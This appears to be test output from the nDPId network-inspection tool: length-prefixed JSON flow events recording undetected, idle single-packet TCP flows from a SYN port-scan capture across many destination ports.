-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27352,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27353,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27352,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27353,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27355,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27356,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27355,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27356,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":58080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":58080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6881,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6881,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":749,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":749,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 